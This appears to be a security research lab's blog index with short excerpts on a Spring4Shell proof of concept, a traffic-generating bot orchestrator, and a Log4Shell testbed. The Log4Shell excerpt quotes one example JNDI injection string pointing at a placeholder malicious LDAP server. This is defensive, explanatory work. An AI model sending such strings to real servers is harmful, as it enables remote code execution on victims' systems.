Posts

Spring4Shell PoC in NCL Testbed

In the current Java-based web application ecosystem, the Spring framework is dominant (used in more than 60% of applications). On March 30th, 2022, two critical vulnerabilities, CVE-2022-22963 and CVE-2022-22965, were reported, which pose a major threat to applications developed with the Spring framework. The first vulnerability affected the “spring-cloud-function-context” library (org.springframework.cloud). The latter, CVE-2022-22965, widely known as Spring4Shell, affected “spring-beans” (org.springframework.cloud). In this report we focus on the Spring4Shell vulnerability, which can allow unauthorized and malicious actors to achieve Remote Code Execution (RCE) on the server that is running the web application. The library org.springframework.cloud:spring-beans is a typical transitive dependency of a popular framework used widely in Java applications and requires Java Development Kit version 9 (JDK9) or newer to be running. It is a bypass for an older CVE, CVE-2010-1622 th

NCL automatically generates network traffics for web IT environment

NATIONAL CYBERSECURITY R&D LAB OCTOBOT DEMO - FOR WEB IT ENV (ENV = Environment)

OVERVIEW

Experimentation/testing in a large-scale testbed environment requires a large amount of emulated traffic to ensure realistic scenario execution and better experiment results. A large number of human-generated network activities can emulate traffic from real network users. Deploying and producing a single activity from an individual user is simple, but emulating and automating it from multiple users with a wide range of activities is challenging. We designed a containerized human agent (i.e., bot) to generate a single activity. Thus, a large number of bots can be deployed and controlled by a single orchestration system. Due to the complexity and wide-ranging usage of container orchestration systems, we need to develop a simpler system that leverages widely used open-source container orchestrators, so that researchers and scientists can easily use it to define and execute activity requirements with a

Log4Shell testbed released

Log4Shell (CVE-2021-44228) is a serious zero-day security vulnerability in the widely used Java logging library Log4j, disclosed to the public on 9 Dec 2021. It allows a remote attacker to execute an arbitrary Java program on a victim server with a vulnerable Log4j library, by simply sending a carefully crafted string (e.g. “${jndi:ldap://malicious_ldap_server/malicious_java_program}”) to the victim server. The attacker may trigger this security vulnerability and launch a remote attack by simply changing their web browser user-agent value to such a string, or just renaming their iOS device to such a string. The damage of this security vulnerability is huge, due to multiple reasons, including: the Java logging library Log4j is widely used in servers; this security bug appeared as early as 2013 and has existed for a long time without being discovered by the public; the attacker can easily and remotely execute any malicious program on a victim server. The root cause of this security vulnera